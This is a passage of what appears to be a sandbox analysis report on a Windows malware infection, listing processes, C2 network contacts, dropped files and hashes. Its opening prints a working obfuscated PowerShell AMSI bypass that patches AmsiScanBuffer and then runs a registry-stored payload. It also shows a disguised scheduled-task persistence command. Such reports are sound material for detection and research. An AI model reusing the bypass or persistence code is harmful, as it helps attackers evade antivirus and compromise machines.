4)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$GaiTtMjAHz,$CxeoJMEHZsuTXm).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+','+'M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+'e'+[Char](100)+'');Write-Output $SxBlOKdvzlW.CreateType();}$SVGvDMWwBhPmm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+'m'+''+'.'+''+[Char](100)+'ll')}).GetType('M'+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+'s'+'o'+''+[Char](102)+''+'t'+''+'.'+'W'+'i'+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'S'+''+[Char](86)+''+'G'+''+'v'+''+[Char](68)+''+'M'+''+[Char](87)+'w'+'B'+''+'h'+'Pm'+[Char](109)+'');$biiYoPOTRzlHNf=$SVGvDMWwBhPmm.GetMethod(''+[Char](98)+''+'i'+''+'i'+''+'Y'+'oPOT'+'R'+''+[Char](122)+''+[Char](108)+''+'H'+'Nf',[Reflection.BindingFlags]''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+'tat'+'i'+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XNlmVKRViYXqPLPwQzV=jnyXNorqFmFo @([String])([IntPtr]);$fIQJMkuvtTFRbURhYElxAe=jnyXNorqFmFo @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MgiNMlfaNjy=$SVGvDMWwBhPmm.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+'a'+'n'+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'r'+'n'+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+'.d'+[Char](108)+''+'l'+'')));$QyautjAwlxElqZ=$biiYoPOTRzlHNf.Invoke($Null,@([Object]$MgiNMlfaNjy,[Object]('L'+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+'i'+[Char](98)+'r'+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$bUotXLQPVcSutqkkD=$biiYoPOTRzlHNf.Invoke($Null,@([Object]$MgiNMlfaNjy,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+'l'+''+[Char](80)+''+'r'+''+[Char](111)+'te'+'c'+'t')));$EsJrIny=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QyautjAwlxElqZ,$XNlmVKRViYXqPLPwQzV).Invoke(''+[Char](97)+''+[Char](109)+'si.'+'d'+''+'l'+''+'l'+'');$HcToesCIouSvsWAcb=$biiYoPOTRzlHNf.Invoke($Null,@([Object]$EsJrIny,[Object](''+'A'+''+[Char](109)+''+'s'+''+'i'+''+[Char](83)+''+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+'er')));$bznzqYzMhj=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bUotXLQPVcSutqkkD,$fIQJMkuvtTFRbURhYElxAe).Invoke($HcToesCIouSvsWAcb,[uint32]8,4,[ref]$bznzqYzMhj);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$HcToesCIouSvsWAcb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bUotXLQPVcSutqkkD,$fIQJMkuvtTFRbURhYElxAe).Invoke($HcToesCIouSvsWAcb,[uint32]8,0x20,[ref]$bznzqYzMhj);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+[Char](84)+'W'+'A'+''+[Char](82)+''+[Char](69)+'').GetValue('di'+[Char](97)+''+'l'+''+'e'+''+'r'+'sta'+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ad4086f3-73e0-4394-9657-9f4e087405a6}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4204 -s 836
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3284 -s 764
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 556 -p 3216 -ip 3216
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3216 -s 368
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 568 -p 2908 -ip 2908
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2908 -s 464
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | connect2me.hopto.org | udp |
| N/A | 37.139.129.113:443 | connect2me.hopto.org | tcp |
| N/A | 20.44.10.122:443 | tcp | |
| N/A | 107.182.129.73:21733 | tcp | |
| N/A | 8.238.21.126:80 | tcp | |
| N/A | 8.238.21.126:80 | tcp | |
| N/A | 8.238.21.126:80 | tcp |
Files
memory/1604-132-0x0000000000000000-mapping.dmp
memory/1604-133-0x0000000000400000-0x0000000000405000-memory.dmp
memory/1604-139-0x0000000000400000-0x0000000000405000-memory.dmp
memory/1876-140-0x0000000000000000-mapping.dmp
memory/1876-141-0x0000000004B30000-0x0000000004B66000-memory.dmp
memory/1876-142-0x0000000005340000-0x0000000005968000-memory.dmp
memory/1876-143-0x0000000005210000-0x0000000005232000-memory.dmp
memory/1876-144-0x00000000059E0000-0x0000000005A46000-memory.dmp
memory/1876-145-0x0000000005AC0000-0x0000000005B26000-memory.dmp
memory/1876-146-0x0000000006050000-0x000000000606E000-memory.dmp
memory/1876-147-0x0000000006680000-0x00000000066B2000-memory.dmp
memory/1876-148-0x0000000074520000-0x000000007456C000-memory.dmp
memory/1876-149-0x0000000006660000-0x000000000667E000-memory.dmp
memory/1876-150-0x0000000007A30000-0x00000000080AA000-memory.dmp
memory/1876-151-0x00000000073E0000-0x00000000073FA000-memory.dmp
memory/1876-152-0x0000000007460000-0x000000000746A000-memory.dmp
memory/1876-153-0x00000000076B0000-0x0000000007746000-memory.dmp
memory/1876-154-0x0000000007620000-0x000000000762E000-memory.dmp
memory/1876-155-0x0000000007670000-0x000000000768A000-memory.dmp
memory/1876-156-0x0000000007660000-0x0000000007668000-memory.dmp
memory/1876-157-0x0000000007780000-0x00000000077A2000-memory.dmp
memory/1876-158-0x0000000008660000-0x0000000008C04000-memory.dmp
memory/3096-159-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
| MD5 | bb86a343080f9f4696c250ef31a18d9d |
| SHA1 | 43b2193dcb1d56eac73ba88a7b461822074192d6 |
| SHA256 | 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0 |
| SHA512 | 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560 |
memory/4800-162-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\new2.exe
| MD5 | 3753f9966e5b4fdc87184c1749f2bd25 |
| SHA1 | 69b76e86bfb4fcf4c0eb2f5fc8b71356e9f4e756 |
| SHA256 | 0f1d090c622967acfa7bde2ef5238255ce8924d5ff7bbf72661821e3d901f299 |
| SHA512 | 3283dfee96e0089873336f3c699604eb33d5c091cdf65a193d4f8e1850625823f62dc02d242290dfd10c10f127bfec26f55b6438fc9ab2c0dd5c9f7cb764e8b6 |
memory/3096-164-0x0000000000BE0000-0x0000000000D4C000-memory.dmp
memory/3096-165-0x00000000055E0000-0x0000000005672000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\new2.exe
| MD5 | 3753f9966e5b4fdc87184c1749f2bd25 |
| SHA1 | 69b76e86bfb4fcf4c0eb2f5fc8b71356e9f4e756 |
| SHA256 | 0f1d090c622967acfa7bde2ef5238255ce8924d5ff7bbf72661821e3d901f299 |
| SHA512 | 3283dfee96e0089873336f3c699604eb33d5c091cdf65a193d4f8e1850625823f62dc02d242290dfd10c10f127bfec26f55b6438fc9ab2c0dd5c9f7cb764e8b6 |
memory/3296-166-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
C:\Users\Admin\AppData\Local\Temp\SysApp.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
memory/4568-173-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
| MD5 | f5c51e7760315ad0f0238d268c03c60e |
| SHA1 | 85ebaaa9685634143a72bc82c6e7df87a78eed4c |
| SHA256 | ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa |
| SHA512 | d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35 |
memory/3096-171-0x0000000006410000-0x000000000641A000-memory.dmp
memory/3316-170-0x0000000000000000-mapping.dmp
memory/4568-174-0x0000000000400000-0x0000000000420000-memory.dmp
memory/4568-179-0x00000000053C0000-0x00000000059D8000-memory.dmp
memory/4568-180-0x0000000004E40000-0x0000000004E52000-memory.dmp
memory/4568-181-0x0000000004F70000-0x000000000507A000-memory.dmp
memory/3296-183-0x0000000002240000-0x0000000002744000-memory.dmp
memory/4568-182-0x0000000004EA0000-0x0000000004EDC000-memory.dmp
memory/3296-184-0x0000000002751000-0x000000000288E000-memory.dmp
memory/4568-185-0x0000000005E60000-0x0000000005ED6000-memory.dmp
memory/4568-186-0x0000000006640000-0x000000000665E000-memory.dmp
memory/4568-187-0x0000000006800000-0x0000000006850000-memory.dmp
memory/3296-188-0x0000000002240000-0x0000000002744000-memory.dmp
memory/4568-189-0x0000000006B20000-0x0000000006CE2000-memory.dmp
memory/4568-190-0x0000000007220000-0x000000000774C000-memory.dmp
memory/4164-191-0x000002BE40320000-0x000002BE40342000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 95b5d975377c32a6ef28bbf4018379ec |
| SHA1 | a27a10c1e0afa57f0341ea6529adb9854ae9e6ee |
| SHA256 | 99d85f152acf2a98615b3c2dc1fc0a2bde5d960871d7625d93b8c9c80744e2b8 |
| SHA512 | ab12d12cd182873162b972617a07c20376aa502377ad6c6998558def326b8fd206d9168d3a17ef3a19f5f86b9eca5833823ce89590a8824ee25b7032b803345b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | 124edf3ad57549a6e475f3bc4e6cfe51 |
| SHA1 | 80f5187eeebb4a304e9caa0ce66fcd78c113d634 |
| SHA256 | 638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675 |
| SHA512 | b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee |
memory/4164-194-0x000002BE41C10000-0x000002BE41C2C000-memory.dmp
memory/4164-195-0x00007FFF77340000-0x00007FFF77E01000-memory.dmp
memory/4164-196-0x000002BE41900000-0x000002BE4190A000-memory.dmp
memory/4164-197-0x000002BE41D10000-0x000002BE41D2C000-memory.dmp
memory/4164-198-0x000002BE41CF0000-0x000002BE41CFA000-memory.dmp
memory/4164-199-0x000002BE41EB0000-0x000002BE41ECA000-memory.dmp
memory/4164-200-0x000002BE41D00000-0x000002BE41D08000-memory.dmp
memory/4164-201-0x000002BE41D30000-0x000002BE41D36000-memory.dmp
memory/4164-202-0x000002BE41D40000-0x000002BE41D4A000-memory.dmp
memory/4164-203-0x00007FFF77340000-0x00007FFF77E01000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | bdb25c22d14ec917e30faf353826c5de |
| SHA1 | 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190 |
| SHA256 | e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495 |
| SHA512 | b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c |
memory/1124-204-0x0000000000000000-mapping.dmp
memory/1412-206-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c697637a9b17f577fccd7e83a5495810 |
| SHA1 | 04e6054584786b88994b0e0a871562227fe2a435 |
| SHA256 | 54992c76969f661b605042ebdc73912dbc42e3f88aa6ffecb7191a598fc17164 |
| SHA512 | 66f85a03889786d2c910880bf32e9ea380740b665f11828d06acb03b6f63fb11be1d70e67acb3bc2118f2c35824919458ce7c85f6843c72a3e5ca44fadc0b3c0 |
memory/4932-208-0x0000000000000000-mapping.dmp
memory/3296-210-0x0000000002751000-0x000000000288E000-memory.dmp
memory/3476-209-0x0000000000000000-mapping.dmp
memory/1780-211-0x00007FFF77340000-0x00007FFF77E01000-memory.dmp
memory/4864-212-0x0000000000000000-mapping.dmp
memory/4124-213-0x0000000000000000-mapping.dmp
memory/548-214-0x0000000000000000-mapping.dmp
memory/4820-215-0x0000000000000000-mapping.dmp
memory/4632-216-0x0000000000000000-mapping.dmp
memory/3432-217-0x0000000000000000-mapping.dmp
memory/1780-218-0x00000269F89D9000-0x00000269F89DF000-memory.dmp
memory/1780-219-0x00007FFF77340000-0x00007FFF77E01000-memory.dmp
memory/1780-220-0x00000269F89D9000-0x00000269F89DF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
| MD5 | f5c51e7760315ad0f0238d268c03c60e |
| SHA1 | 85ebaaa9685634143a72bc82c6e7df87a78eed4c |
| SHA256 | ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa |
| SHA512 | d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35 |
memory/1940-222-0x00007FF6FD461938-mapping.dmp
memory/4536-223-0x00007FFF782D0000-0x00007FFF78D91000-memory.dmp
memory/4536-224-0x00007FFF964D0000-0x00007FFF966C5000-memory.dmp
memory/4536-225-0x00007FFF95350000-0x00007FFF9540E000-memory.dmp
memory/4920-227-0x0000000140002314-mapping.dmp
memory/4920-226-0x0000000140000000-0x0000000140029000-memory.dmp
memory/4920-229-0x0000000140000000-0x0000000140029000-memory.dmp
memory/4920-230-0x00007FFF964D0000-0x00007FFF966C5000-memory.dmp
memory/4920-231-0x00007FFF95350000-0x00007FFF9540E000-memory.dmp
memory/4520-245-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/4600-247-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/1900-294-0x000001F5DDEB0000-0x000001F5DDED7000-memory.dmp
memory/4536-297-0x00007FFF95350000-0x00007FFF9540E000-memory.dmp
memory/1804-279-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/1772-278-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/1684-277-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/1668-276-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/1628-275-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/1584-274-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/1448-272-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/1268-271-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/1956-269-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/2676-268-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/2668-267-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/2560-266-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/2552-265-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/2480-264-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/2348-262-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/2112-261-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/4536-259-0x00007FFF782D0000-0x00007FFF78D91000-memory.dmp
memory/2752-257-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/2692-258-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/2764-255-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/4696-254-0x0000000000000000-mapping.dmp
memory/3032-253-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/4920-298-0x0000000140000000-0x0000000140029000-memory.dmp
memory/3600-252-0x0000000000000000-mapping.dmp
memory/4920-299-0x00007FFF964D0000-0x00007FFF966C5000-memory.dmp
memory/2252-251-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/2340-250-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/1900-249-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/1212-246-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/1524-244-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/1280-242-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/3436-241-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/3736-240-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/4304-239-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/4072-237-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/460-236-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/2688-235-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/1496-273-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/1984-270-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/2392-263-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/2096-260-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/2776-256-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/1260-248-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/3768-243-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/4700-238-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/676-234-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/312-232-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/588-233-0x00007FFF56550000-0x00007FFF56560000-memory.dmp
memory/588-300-0x000002B30A690000-0x000002B30A6B1000-memory.dmp
memory/588-301-0x000002B30A6C0000-0x000002B30A6E7000-memory.dmp
memory/312-302-0x0000022E406D0000-0x0000022E406F7000-memory.dmp
memory/676-303-0x000001BFA6DC0000-0x000001BFA6DE7000-memory.dmp
memory/440-304-0x000001F3B22B0000-0x000001F3B22D7000-memory.dmp
memory/956-305-0x000002C1729D0000-0x000002C1729F7000-memory.dmp
memory/4536-306-0x00007FFF964D0000-0x00007FFF966C5000-memory.dmp
memory/732-307-0x000001F826740000-0x000001F826767000-memory.dmp
memory/2252-308-0x0000018DDC310000-0x0000018DDC337000-memory.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3C3D.tmp.csv
| MD5 | f993580670e3aef0530dbdfdd52e94ca |
| SHA1 | 0147d041f26bddd0dbb53159b35240542aaa154b |
| SHA256 | 88ef519bcb69ad486b6f68a2ddc293fc39f921425801b592240d221210ac812c |
| SHA512 | f5af66fd5b40b51f49cf4818d174c994e77eece8088cd0b2d4cd7c3846a26e743089d22d2f743fb5bc3abb53d9de27bee85066943b6f05ce5d2608fc88fd3566 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3C6D.tmp.csv
| MD5 | b27e865aeac2f30edb1a7421f69b706b |
| SHA1 | d6c5f66386f5882eb34a22e8d2fe9f46585289f7 |
| SHA256 | c06fe2e6c1a21a99af76b67f9d30a871d883c00571da6061a464ad45c39c4f8d |
| SHA512 | b3bdc62fa35e497bc9b4c922b1a9e14794574cc8da89decd716fdcde8ce203e2164e5d644a54ca8adc37cc00647b0d1c0aa23b134d1769df694d3eb988879914 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3C7D.tmp.txt
| MD5 | b67d0c36c8d127de55331c2f01d276ee |
| SHA1 | 966d07d31b845dc7a3b17a1ce96a6ebca827cf8f |
| SHA256 | f8f1fdcd622844f6c78d8fa131a83a275030b23cb50b14c409094054c0b2be1a |
| SHA512 | 6a32af0f9b9c28d811b34f32c7be1d5ef3e58f00fb624965f82796951940f3c63bd53e73314efb44f3a3e0982e5808ceb03ab18195a55b2a46510e347e3a1cdd |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3CDC.tmp.txt
| MD5 | 62abcce7bfae19943d01ae631ccba052 |
| SHA1 | 13c7ab9038fb7778d093688891aab710315e5e93 |
| SHA256 | 438b62b424ca1a722bb0d5da18e9d5a415e655931fc96846c20576973de29461 |
| SHA512 | 7ab8c195a1fa003c9d6109d2d5fc790306dc22e4b98e48a1c89b5b4d37fe0a60010c7edc82d4b1e0db614db0681b9aae317318c296b5e7d174045c26a4f63822 |
memory/3756-372-0x0000000000000000-mapping.dmp
memory/1892-376-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
| MD5 | b6bbab9f72c88d07b484cc339c475e75 |
| SHA1 | f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1 |
| SHA256 | dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f |
| SHA512 | 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5 |
memory/2944-381-0x0000000000000000-mapping.dmp
memory/1156-387-0x0000000000000000-mapping.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD67D.tmp.csv
| MD5 | 7a0fc09afe684df626cb0946e7adecea |
| SHA1 | 519476614bec773806949a5062a9a1b88ceb8a8e |
| SHA256 | a389f12dda67595460d6126d4892f20e0611438592b896c0286d8ee1102b8aa6 |
| SHA512 | faf437df3261759f906c2ea180b02e707d9723807f32c42cf0513014b4192eef02e70089a32641979ba076c6bcaafeff4ef581c7f9ef728b184440d27e7c2e45 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD6CC.tmp.txt
| MD5 | e4d1099730a7b3cef613e513c8ab93c1 |
| SHA1 | 07b46e39ba18f2257fa457503cf10f0ae432a2fb |
| SHA256 | aed2a3f4ed925f435e0a49755faec14ed25ae727975947e43ca2f027a434adf4 |
| SHA512 | 97a1f7525d250f789de313b0b8b94fcf58d74fc88eabaa3e0a349c1590203036bbf1ea3db16fb966532195066b055304a21004cc16243c770a88e5b00f0f313a |
memory/4392-397-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.chk
| MD5 | 97e21c3ace4c909e979d057e48b0511b |
| SHA1 | f9abd1563142bc87241792a6bff9266b000477f9 |
| SHA256 | e47e6b4f3b270f2492a6dc3a787b5d757677e806021cc0c7406b9b68c4928215 |
| SHA512 | 72eb2f4cb72a868fddeebe7d3206a6df581dc415ffb39552b16b805feef268c6e32295f61c9125699d95728812704438272c3e61097db6454b13455358af2580 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.log
| MD5 | 92a5394c98970c2df97518ccfc941abc |
| SHA1 | ae03e5eb972afe00e87028bf85c0cf82734748dd |
| SHA256 | 4e13d98ce827d7c819bf3c4a9f2710375700d4be1dd86e70020fa8fd6a849f6b |
| SHA512 | 3a0fee76337d78dbeca41301158bb33d2a3f78fb4c82a27c973d4dfd52ec072561568f2721a661f28afc26765cbd846cca270005c0e388c9fb88f4ffe5928d5f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat
| MD5 | fc15ddc1aa5e610bdb3810289a075271 |
| SHA1 | ff298ce2d03f8e42eb7eba3fd94310a94148dcae |
| SHA256 | 7fe3aa950904d80928e76f7ced4c581374da94acf39546ec5e69921ee943f87c |
| SHA512 | e2ead360c0244bedbd3dd5b5d200567aa3b0b1d7424440e0ff6132a4408e38d2c53ea20391863680fb54b7aa5aa7999ae4b6e70ee597676a4be5f96e4804435c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm
| MD5 | 3694b353dbe71a48a6dcb93f2725f228 |
| SHA1 | 43822178e3d40fbf92093b57ae178019fba8f6ec |
| SHA256 | e8dda600070ff70908f0f315720406011f205656af8cab423660931a2ae8bdcd |
| SHA512 | 8614cf3c1e79350ed721ee6e991d1613e09d5edc2f5896f66cf3aae372a796cfd18320fbb6d3f0de707c6931bae3a90786e8a8a658239837858868f11aedea59 |
memory/3480-407-0x0000000000000000-mapping.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WERDE31.tmp.txt
| MD5 | 24f9a61651b91727b24e7f71d73be9f3 |
| SHA1 | 10234bdd506470ea68780abe131aaf9fc6e1a5c1 |
| SHA256 | d4721814f7bf31176a91686d5b0272931912b4ada5d689c9b720d263b65330eb |
| SHA512 | 8e0074da8c72fc169edfeb162d992ac4d9f421cd354b20acb59255c9dd7049366d83e02a8407666d16f79a895f23fcdaedb1f1a28aafb9f7e23af0beaa9480b2 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WERDDF2.tmp.csv
| MD5 | f49fd4a936729b7d48d000e0d25b1749 |
| SHA1 | c6086c51d7d491a071441a553475f107afdf5ad6 |
| SHA256 | 413f00c12a845c63b27793846e1131fa0592c2033eacfe5c8d3cb00fbc340106 |
| SHA512 | 0055710db934ab84003612e7482ebc08bbf446af1a2bf0b4166f673bdd8b51a8f9ce6d9f7d6b57d8f6db06b7f345898b610f03dc97fffacf95e3ab148e612953 |